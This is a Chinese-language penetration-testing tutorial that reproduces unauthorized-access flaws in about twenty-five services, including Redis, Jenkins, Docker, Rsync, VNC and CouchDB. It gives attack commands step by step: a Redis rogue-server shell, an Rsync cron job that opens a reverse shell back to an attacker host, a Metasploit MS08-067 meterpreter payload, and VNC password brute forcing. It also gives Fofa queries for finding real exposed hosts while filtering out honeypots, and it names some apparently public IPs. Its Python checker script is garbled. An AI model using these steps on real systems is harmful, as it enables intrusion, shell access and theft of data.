【未授权访问漏洞复现~~~】

一: Redis未授权访问漏洞

步骤一:进入vulhub目录使用以下命令启动靶机…

进入目录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps

步骤二:在Kali上安装redis程序进行服务的链接.

#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176 -p 6379
#redis常见命令
 (1)查看信息:info
 (2)删除所有数据库内容:flushall
 (3)刷新数据库:flushdb
 (4)看所有键:KEYS *，使用select num可以查看键值数据。
 (5)设置变量:set test“whoami"
 (6)config set dir dirpath 设置路径等配置
 (7)config get dir/dbfilename 获取路径及数据配置信息
 (8)save保存
 (9)get 变量，查看变量名称

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞…下载以下攻击项目…

https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用工具执行以下命令获取目标的命令执行环境，交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108

二: MongoDB未授权访问漏洞

步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境…

拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a

步骤二:使用Nmap的插件脚本进行扫描…发现存在未授权访问漏洞.

# 扫描命令
nmap -p 27017 --script mongodb-info 192.168.4.176

步骤三:也可尝试使用MSF中的模块进行漏洞测试…不需要认证即可直接连接

use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 192.168.4.128
set threads 15
exploit

步骤四:即存在未授权访问漏洞使用Navicat进行连接

三: Memcached未授权访问漏洞

步骤一:下载Memcached程序并执行以下命令…启动Memcached漏洞环境

#emcached程序下载
https://www.121down.com/soft/softview-28366.html
https://www.runoob.com/memcached/window-install-memcached.htm
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二:使用TeInet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容，造成敏感信息泄露

步骤三:使用Nmap程序的脚本进行漏洞扫描

nmap -p11211 --script memcached-info 192.168.4.199

步骤四:漏洞探测脚本(参考)

#!/usr/bin/env python#_*_ coding:utf_8_*defMemcache_check(ip, port=11211,timeout=5):try:
        socket.setdefaulttimeout(timeout)
        s=socket.socket(socket.AF INET,socket.SOCK STREAM)
        s.connect((ip，int(port)))
        s.send("stats\r\n")
        result =s.recv(1024)if"STAT version"in result:print'[+]Memcache Unauthorized:'+ip+':'+str(port)except Exception，e:pass
if__name__=='__main__':
    Elasticsearch check("127.0.0.1")

四: Zookeeper未授权访问漏洞

步骤一:使用以下Fofa语法搜索资产信息.

port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试，

echo envi | nc ip port
my:
3.5.192.161 2181

步骤三:可使用Zookeeper可视化管理工具进行连接…

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

五: Jenkins未授权访问漏洞

步骤一:使用以下fofa语法进行产品搜索.

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中…点击 Manage Jenkins–>ScritpConsole 在执行以下命令

#执行命令
println "whoami" .execute().text
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

六: Jupyter NoteBook未授权访问漏洞

步骤一:通过以下fofa语法进行产品搜索…或使用vulhub启动靶场…

#fofa语法
"Jupyter Notebook" && port="8888"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面，不需要输入密码。

步骤三:从New->Terminal 新建一个终端，通过新建的终端可执行任意命令

#命令执行页面
http://ip/terminals/1

七、Elasticsearch未授权访问漏洞

步骤一:使用以下Fofa语法进行Elasticsearch产品搜索:

"Elasticsearch" && port="9200"

步骤二:存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆.

#目标地址
#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes查看节点数据

步骤三:可按照上面查看节点信息等、

八、Kibana未授权访问漏洞

步骤一:使用以下Fofa语句搜索Kibana产品…并打开页面…

"kibana" && port="5601"

步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面.

#拼接路径
HTTP://{IP}/app/kibana#/
#eg
my:
http://ip:5601/app/kibana#/
http://ip:5601/app/home#/
http://ip:5601/app/kibana_overview#/

九、Docker Remote APl未授权访问漏洞*

步骤一:使用以下Fofa语句对Docker产品进行搜索…

port="2375"

步骤二:直接使用浏览器访问以下路径…

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息

步骤三:使用-H参数连接目标主机的docker，使用ps命令查询目标系统运行的镜像。

docker-H tcp://ip:2375 psdocker-H tcp://ip:2375 version
docker-H tcp://ip:2375 exec-it 1f4 /bin/bash
操作思路:
    docker pull 下载有Docker逃逸的容器下来d
    ocker逃逸间接获取安装docker主机控制权限

十、Kubernetes Api Server未授权访问漏洞

步骤一:使用以下Fofa语法搜索Kubernetes产品…

port="8080" && app="Kubernetes"

步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表…

十一:Hadoop未授权访问漏洞

步骤一:使用以下FOFA语法进行Hadoop产品的搜索…

port="8088" && app="Hadoop"

步骤二:开启页面直接访问不经过用户密码验证…

http://ip:8088/cluster

十二:ActiveMQ未授权访问漏洞

步骤一:使用以下Fofa语法搜索产品…

body="ActiveMQ" && port="8161"

步骤二:ActiveMQ默认使用8161端口，默认用户名和密码是 admin/admin，在打开的页面输入…

http://ip:8161/
http://ip/admin/

第一种

第二种

十三:RabbitMQ未授权访问漏洞

步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索…

port="15672"
port="15692"
port="25672"

步骤二:在打开的页面中可输入默认的账号和密码进行登陆

默认账号密码都是guest
http://ip15672/
http://ip:15672/

十四:Springboot Actuator未授权访问漏洞

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点，原生端点主要有:

/dump -显示线程转储(包括堆栈跟踪)
/autoconfig -显示自动配置报告
/configprops-显示配置属性
/trace -显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown -关闭应用程序
/info - 显示应用信息
/metrics -显示当前应用的'指标"信息
/health - 显示应用程序的健康指标
/beans-显示Spring Beans的完整列表
/mappings-显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart-重新启动应用程序

步骤一:使用以下Fofa语句搜索资产并打开页面访问.

icon_hash="116323821"

步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了springboot 框架…

http://ip/

步骤三:拼接以下路径查看泄露的数据

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等)，如果存在登录用户的操作请求，可以伪造cookie进行登录。
访问/env端点获取全部环境属性，由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务，所以通过监控信息有时可以mysql、mangodb 数据库信息，如果数据库正好开放在公网，那么造成的危害是巨大的。
git 项目地址泄露，这个一般是在/health 路径，比如如下站点，访问其 health 路径可探测到站点 git 项目地址。
my:
https://ip/

十五:FTP未授权访问漏洞(匿名登陆)

步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆，则可直接进行内容查看…

ftp://ip:port/

十六:JBoss未授权访问漏洞

步骤一:使用以下语法搜索Jboss产品并打开其页面.

title="Welcome to JBoss"

步骤二:拼接以下路径且无需认证直接进入控制页面.

#拼接路径
http://ip:port/jmx-console/

步骤三:后续可以利用 jboss.deployment 部署shell

十七:Ldap未授权访问漏洞

步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证…

#Fofa语法
port="389"
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

步骤二:启动工具并测试存在未授权的LDAP服务…成功如下.

步骤三:连接目标LDAP服务并查看其内容

十八:Rsync未授权访问漏洞

步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up-d

步骤二:可使用Nmap扫描该端口是否开启服务，还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…

# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules list

步骤三:使用命令进行链接并读取文件

执行命令#
rsync rsync://192.168.124.153:873/
rsync rsync://192.168.124.153:873/src/

步骤四:对系统中的敏感文件下载操作…/etc/passwd

# 执行命令
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径
例如:rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/
# 结果查看
root@kali:/# cat /tmp/tmp/passwd

步骤五:上传文件…如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例.

#攻击机操作
root@kali:/# echo "<?php phpinfo();?>" > phpinfo.php
root@kali:/# cat ./phpinfo.php
root@kali:/# rsync ./phpinfo.php rsync://192.168.124.153:873/src/home
# 靶机操作
root@4448da0725bd:/#ls
root@4448da0725bd:/# cd home/
root@4448da0725bd:/home#ls
phpinfo.php
root@4448da0725bd:/home# cat phpinfo.php

步骤六:反弹shell…在此可利用定时任务cron来反弹获取shell

# 1.查看定时任务
root@kali:/# rsync rsync://192.168.124.153:873/src/etc/crontab
# 2.将定时任务文件下载下来
rsync rsync://192.168.124.153/src/etc/crontab /tmp/tmp/crontab.txt
# 3.定时任务内容为，大致意思为每17分钟调用一次/etc/cron.hourly
# 4.创建shell文件
#!/bin/bash
/bin/bash i>& /dev/tcp/10.10.10.128/4444 0>&1
chmod 777 shell
#6.上传shell至靶机
root@kali:/#rsync -av /tmp/tmp/shell rsync://192.168.124.153:873/src/etc/cron.hourly
# 7.攻击机开启nc监听相应端口
nc -lvp 4444

十九:VNC未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集…

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc none_auth
msf6 auxiliary(scanner/vnc/vnc none_auth)>show options
msf6 auxiliary(scanner/vnc/vnc none_auth)>set rhosts 192.168.168.200-254
msf6 auxiliary(scanner/vnc/vnc none_auth)>set threads 100
msf6 auxiliary(scanner/vnc/vnc none_auth)>run
# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc login)>192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set rhosts 192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set blank_passwords true /密码爆破
msf6 auxiliary(scanner/vnc/vnc login)>run
# 加载攻击模块
msf6 exploit(windows/smb/ms08 067_netapi)>use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08 067_netapi)>set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08 067 netapi)>set rhosts 192.168.168.228
msf6 exploit(windows/smb/ms08 067 netapi)>set lhost 192.168.168.102
msf6 exploit(windows/smb/ms08 067 netapi)>set target 34
msf6 exploit(windows/smb/ms08 067 netapi)>exploit
获取会话后，直接run vnc可控制远程虚拟机
# 直接控制远程机器
msf6 >use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit

步骤三:VNC链接验证…

vncviewer ipaddress

二十:Dubbo未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集.

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤二:使用TeInet程序直接进行链接测试…

telnet IP port

二十一:NSF共享目录未授权访问

步骤一:使用以下语句在Fofa上进行资产收集.

"nfs"

步骤二:执行命令进行漏洞复现….

#安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享目录
showmount -e ip
#挂载相应共享目录到本地
mount -t nfs ip:/grdata /mnt
#卸载目录
umount /mnt

二十二:Druid未授权访问漏洞

步骤一:使用以下语句在Fofa与Google上进行资产收集.

# Fofa
title="Druid Stat Index"
#PHPINFO页面
inurl:phpinfo.php intitle:phpinfo()info.php test.php
# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index'

步骤二:对访问到的站点查看…

http://ip:8010/druid/websession.html
http://ip:8088/pos/druid/websession.html

步骤三:Druid批量扫描脚本…

https://github.com/MzzdTOT/CVE-2021-34045

二十三:CouchDB未授权访问

步骤一:使用以下语句在Fofa上进行资产收集…或开启Vulhub靶场进行操作…

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)
# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

步骤二:执行未授权访问测试命令

curl 192.168.1.4:5984 
curl 192.168.1.4:5984/_config

步骤三:反弹Shell参考…

https://blog.csdnnet/qq_45746681/article/details/108933389

二十四:Altassian Crowd未授权访问漏洞

(等待更新)

二十五:RTSP未授权访问漏洞

VLC media player，单击“媒体”选项，选择“打开网络串流”。
在弹出的窗口中输入网络URL:
rtsp://admin:888888@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1
username:用户名。例如admin。
  password:密码。例如admin。
  ip:为设备IP。例如 192.168.1.1.
  port:端口号默认为554，若为默认可不填写。
  channel:通道号，起始为1。例如通道2，则为channel=2
  subtype:码流类型，主码流为0(即subtype=0)，辅码流为1(即subtype=1)

步骤一:使用以下语句在Fofa上进行资产收集.

(port=“554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp'